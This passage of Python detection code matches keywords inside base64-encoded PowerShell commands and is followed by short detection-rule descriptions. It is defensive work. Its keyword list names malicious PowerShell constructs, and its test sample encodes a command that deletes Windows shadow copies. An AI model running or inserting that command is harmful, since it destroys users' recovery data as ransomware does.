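    for label, data in (("utf8", keyword.encode("utf-8")), ("utf16le", keyword.encode("utf-16-le"))):
        for shift, v in enumerate(base64_offset_variants(data)):
            out[v] = (label, shift)
    return out


def detect_encoded_keywords(blob: str, keywords) -> dict:
    """Map each keyword found inside a base64 blob to the (encoding, offset) pairs that matched."""
    hits = {}
    for kw in keywords:
        for variant, where in keyword_variants(kw).items():
            if variant in blob:
                hits.setdefault(kw, []).append(where)
    return hits


def encode_wide(script: str) -> str:
    """Base64 over UTF-16LE, i.e. what powershell.exe -EncodedCommand consumes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Keep keywords long: a 3-byte word leaves only 3 or 4 base64 characters after
# stripping, which would match almost anything.
KEYWORDS = ("Win32_Shadowcopy", "Reflection.Assembly", "Invoke-Expression", "Net.WebClient")

# Constructed sample: the same script behind 0, 1 and 2 extra characters (0, 2 and 4
# extra UTF-16LE bytes) places the keyword on all three alignments.
SAMPLE_BLOBS = [encode_wide(prefix + "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject")
                for prefix in ("", "a", "ab")]

if __name__ == "__main__":
    for blob in SAMPLE_BLOBS:
        print(detect_encoded_keywords("powershell.exe -enc " + blob, KEYWORDS))
```

Generate the variants once when the rule is built and ship them as plain contains patterns; the stripping rules (skip 0/2/3 leading characters, drop 0/3/2 trailing ones) are what makes the match independent of where the keyword sits in the encoded command.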
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
Detects a highly relevant Antivirus alert that reports an exploitation framework
Detects code injection into another process with PowerShell
Detects use of WinAPI functions in PowerShell